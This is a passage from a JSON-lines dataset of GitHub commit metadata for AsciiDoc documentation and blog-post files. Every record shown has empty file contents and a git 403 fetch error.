'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d009f80241607b616ee6e3ce8ebf5d231ceea340","subject":"add the development continuum doc","message":"add the development continuum 
doc\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/topic\/continuum.adoc","new_file":"docs\/src\/main\/asciidoc\/topic\/continuum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c26a174aca851cce98eaaa397e4b0732022fa65c","subject":"Update 2016-09-15-Sample-Blog-Hello-world.adoc","message":"Update 2016-09-15-Sample-Blog-Hello-world.adoc","repos":"gdfuentes\/gdfuentes.github.io,gdfuentes\/gdfuentes.github.io,gdfuentes\/gdfuentes.github.io,gdfuentes\/gdfuentes.github.io","old_file":"_posts\/2016-09-15-Sample-Blog-Hello-world.adoc","new_file":"_posts\/2016-09-15-Sample-Blog-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gdfuentes\/gdfuentes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60d5df3279485baa80c013ff6fee8f14cfa59f0a","subject":"Update 2016-11-10-091800-Thursday-Morning.adoc","message":"Update 2016-11-10-091800-Thursday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_file":"_posts\/2016-11-10-091800-Thursday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84bb6e38cfde67b9d3ac09bfb730485fc9b0677f","subject":"Update 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","message":"Update 17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_file":"_posts\/17-07-2016-Los-estilos-de-aprendizaje-de-Kolb.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"235e0814621203d528305b7d4b5e70f6ea2f9086","subject":"Update 2015-07-27-A-title.adoc","message":"Update 2015-07-27-A-title.adoc","repos":"juliardi\/juliardi.github.io,juliardi\/juliardi.github.io,juliardi\/juliardi.github.io","old_file":"_posts\/2015-07-27-A-title.adoc","new_file":"_posts\/2015-07-27-A-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juliardi\/juliardi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c488798e9bde0d7d47cacc1fd789f3da0a8384e5","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2251fa20ac93f1e6c94cb060ea640f0e89db7af7","subject":"Kill Bill events - Initial commit","message":"Kill Bill events - Initial commit","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/kill_bill_events.adoc","new_file":"userguide\/tutorials\/kill_bill_events.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44d7eb60baca34abfcf0659c8f538bf0af630f22","subject":"Start a release-process document (#82)","message":"Start a release-process document (#82)\n\n","repos":"asciidoctor\/asciidoclet,johncarl81\/asciidoclet,johncarl81\/asciidoclet","old_file":"src\/docs\/asciidoc\/release-process.adoc","new_file":"src\/docs\/asciidoc\/release-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johncarl81\/asciidoclet.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"024d6d827b87686d2f60b1f60d5bdb706f5862ad","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36677c40c1419436140f9d113e35c81f4b423b85","subject":"Document new defaults and changed variable names","message":"Document new defaults and changed variable names\n","repos":"rumpelsepp\/pynote","old_file":"man\/noterc.5.adoc","new_file":"man\/noterc.5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0136a930ec054df8188c5effae63ed13988cc87","subject":"JSON in short","message":"JSON in short\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"JSON.adoc","new_file":"JSON.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7405595f1f380c5719cb7958345d0cdb093650ca","subject":"Document note filter","message":"Document note filter\n","repos":"rumpelsepp\/pynote","old_file":"man\/note.1.adoc","new_file":"man\/note.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc6f5bc4c1a71bce77db957dc2f618859d97b64f","subject":"Created javadoc override","message":"Created javadoc override\n\nSigned-off-by: francesco 
<56fdeb8ec48293e404ca3681b2b8738f930aab75@gmail.com>\n","repos":"aesteve\/vertx-web,vert-x3\/vertx-web,InfoSec812\/vertx-web,aesteve\/vertx-web,vert-x3\/vertx-web,InfoSec812\/vertx-web,vert-x3\/vertx-web,aesteve\/vertx-web,InfoSec812\/vertx-web,vert-x3\/vertx-web,aesteve\/vertx-web,aesteve\/vertx-web,InfoSec812\/vertx-web,vert-x3\/vertx-web,InfoSec812\/vertx-web,InfoSec812\/vertx-web","old_file":"vertx-web-api-contract\/src\/main\/asciidoc\/override\/rxjava2.adoc","new_file":"vertx-web-api-contract\/src\/main\/asciidoc\/override\/rxjava2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-web.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b57bf62e0fd730cd06cea301f001556519589ad","subject":"Update 2015-09-14-.adoc","message":"Update 2015-09-14-.adoc","repos":"whelamc\/life,whelamc\/life,whelamc\/life","old_file":"_posts\/2015-09-14-.adoc","new_file":"_posts\/2015-09-14-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/whelamc\/life.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3735fdfac3a1f7947e1a404dcdd740db796a429f","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff2ea0c801e745f97a32f1453fcbb5edeb3c7e3d","subject":"Changes to documentation","message":"Changes to documentation\n","repos":"ForensicArtifacts\/artifacts,joachimmetz\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,Onager\/artifacts,joachimmetz\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Onager\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5c4d6145273c2ffc89029fa9aefafce49a06230","subject":"doc: Use other asciidoc construct for code block","message":"doc: Use other asciidoc construct for code block\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b0f32bdb19e4ede501bd16054935d46d154c48a","subject":"y2b create post OCZ Vertex 3 SSD Unboxing \\u0026 Overview","message":"y2b create post OCZ Vertex 3 SSD Unboxing \\u0026 
Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-21-OCZ-Vertex-3-SSD-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-06-21-OCZ-Vertex-3-SSD-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7732a557e82d9674299667086058059dc1afbe03","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e6cdeb63a3f74ae949c9a2c74ce1bef3697ae62","subject":"y2b create post OnePlus 5T Limited Edition Unboxing + Easter Egg","message":"y2b create post OnePlus 5T Limited Edition Unboxing + Easter Egg","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-20-OnePlus5TLimitedEditionUnboxingEasterEgg.adoc","new_file":"_posts\/2017-12-20-OnePlus5TLimitedEditionUnboxingEasterEgg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"492f5396e4e25f03fb9abee3f6e5e7a575221bf2","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6faec0ce65ecca7b16f10800d49ae51199096f2","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e72d146e8457f73a4072c233927cf7b5140e7eba","subject":"Create README.adoc","message":"Create 
README.adoc","repos":"rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python,rockwolf\/python","old_file":"ledgerdump\/README.adoc","new_file":"ledgerdump\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rockwolf\/python.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8b19aec7f5bf4ee41e7b356bbce720fe12d8073c","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30d436ab4eae8b33cc3b53eed2653615e690971f","subject":"Update 2016-07-30-Web-Multimessengers.adoc","message":"Update 2016-07-30-Web-Multimessengers.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-07-30-Web-Multimessengers.adoc","new_file":"_posts\/2016-07-30-Web-Multimessengers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"148019bd83498161505cfa2d383df6e225c75659","subject":"Update 2016-12-30-Kleptography-in-RSA.adoc","message":"Update 2016-12-30-Kleptography-in-RSA.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_file":"_posts\/2016-12-30-Kleptography-in-RSA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62d2ab18b5499338b7bd00c592e04548cdfaf017","subject":"Update 2013-05-05-Mockito-on-peut-aussi-mocker-partiellement.adoc","message":"Update 2013-05-05-Mockito-on-peut-aussi-mocker-partiellement.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-05-05-Mockito-on-peut-aussi-mocker-partiellement.adoc","new_file":"_posts\/2013-05-05-Mockito-on-peut-aussi-mocker-partiellement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b75004cd6270f42b4abd6791000616303a761ec","subject":"y2b create post The $26 Upgrade That Could Save Your Laptop...","message":"y2b create post The $26 Upgrade That Could Save Your Laptop...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-09-The-26-Upgrade-That-Could-Save-Your-Laptop.adoc","new_file":"_posts\/2017-09-09-The-26-Upgrade-That-Could-Save-Your-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0493fb13a63cc2912b089138e7f9e1437ad5f642","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aad8384fe6d6666d58077337c86779d5a67f2b88","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4bd3c9ebcfb4c9a46e0a5c6887ede35287d9b15","subject":"First draft of Cypher 9","message":"First draft of Cypher 9\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/cypher-9.adoc","new_file":"docs\/cypher-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"035e07eb1cdf79efa805e6067680bb5bb79cb698","subject":"Update 2017-07-18-Create-stories-and-tasks-for-OP-Installer.adoc","message":"Update 2017-07-18-Create-stories-and-tasks-for-OP-Installer.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-18-Create-stories-and-tasks-for-OP-Installer.adoc","new_file":"_posts\/2017-07-18-Create-stories-and-tasks-for-OP-Installer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61c404be21115d4315eb479f05fd67152a0d8317","subject":"Added install details for liberty core","message":"Added install details for liberty core\n","repos":"waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle,waratek\/spiracle,prateepb\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"ca1235a1b071f179f7f18eb888f597e13a56f12b","subject":"Update README demo name","message":"Update README demo name\n","repos":"clara-labs\/react-popover,littlebits\/react-popover,gregory90\/react-popover","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/littlebits\/react-popover.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"743acce38476eb98c1d8774ec5346fadbe3856e6","subject":"Added TravisCI badge","message":"Added TravisCI badge\n","repos":"GYMY-16\/gymybook,GYMY-16\/gymybook","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/gymybook.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3481331c1f25b5c018ded41da4ebec2a3b66a885","subject":"Added README.adoc.","message":"Added README.adoc.\n","repos":"ToToTec\/CmdOption,ToToTec\/CmdOption","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ToToTec\/CmdOption.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e26216b3984d433cfae3cdfaab143c792255e95c","subject":"a final => the final","message":"a final => the final\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c8cd99bdf92b8afb9298822dde35da2e362e195","subject":"Introduces conditional rendering in README","message":"Introduces conditional rendering in README","repos":"arquillian\/arquillian-core,MatousJobanek\/arquillian-core,rhusar\/arquillian-core,rhusar\/arquillian-core,MatousJobanek\/arquillian-core,bartoszmajsak\/arquillian-core,bartoszmajsak\/arquillian-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bartoszmajsak\/arquillian-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e78145b0cc23799f4bc08bd52fe38fbcfc60b354","subject":"add readme","message":"add readme\n","repos":"kyonmm\/startup-spock","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kyonmm\/startup-spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38b6778b69c29b9e57a68ff729865e9fbd565a39","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Publish 
2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05441657999b2175135b2aed672b101fb69adbcd","subject":"Add first iteration of the protean message","message":"Add first iteration of the protean message\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/What is Protean.asciidoc","new_file":"docs\/src\/main\/asciidoc\/What is Protean.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9683f1d0d56dc03ce58f372f29219a51ae42b220","subject":"Update 2015-01-31-My-English-Title.adoc","message":"Update 2015-01-31-My-English-Title.adoc","repos":"lawrencetaylor\/hubpress.io,lawrencetaylor\/hubpress.io,lawrencetaylor\/hubpress.io,lawrencetaylor\/hubpress.io","old_file":"_posts\/2015-01-31-My-English-Title.adoc","new_file":"_posts\/2015-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lawrencetaylor\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"deb4f06ce4c9dab9834a63fc7b63bcd0e813cb6a","subject":"Update 2016-01-23-Giving-up-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65d9d386a7dcf709e03e188d3505ce576a425de7","subject":"Update 2017-04-21-MVC-MVP-and-MVVM.adoc","message":"Update 2017-04-21-MVC-MVP-and-MVVM.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2017-04-21-MVC-MVP-and-MVVM.adoc","new_file":"_posts\/2017-04-21-MVC-MVP-and-MVVM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa32bfedd81e6827ac96f5df97f3251cd9d5cd56","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"14FRS851\/14FRS851.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/14FRS851\/14FRS851.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"403aa9a07e37ed82c88a91238e101a8ff1a6ca41","subject":"Added Readme to LED Mesh example","message":"Added Readme to LED Mesh example\n","repos":"mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,ihassin\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh,mrquincle\/nRF51-ble-bcast-mesh","old_file":"examples\/LED_mesh\/README.adoc","new_file":"examples\/LED_mesh\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrquincle\/nRF51-ble-bcast-mesh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"16a60a21faaaf3f40b2842767699318347d8ce54","subject":"Update 2016-03-29-Ingenieria-social-S-E.adoc","message":"Update 2016-03-29-Ingenieria-social-S-E.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_file":"_posts\/2016-03-29-Ingenieria-social-S-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b711a799243e057e01884c7e4ad0e45d1f093bba","subject":"Update 2016-10-05-Etat-de-lart-createur.adoc","message":"Update 2016-10-05-Etat-de-lart-createur.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-05-Etat-de-lart-createur.adoc","new_file":"_posts\/2016-10-05-Etat-de-lart-createur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5de5551094b348c1d5087fa5140cb75f15d317e","subject":"Update 2016-11-11-092000-Friday-Morning.adoc","message":"Update 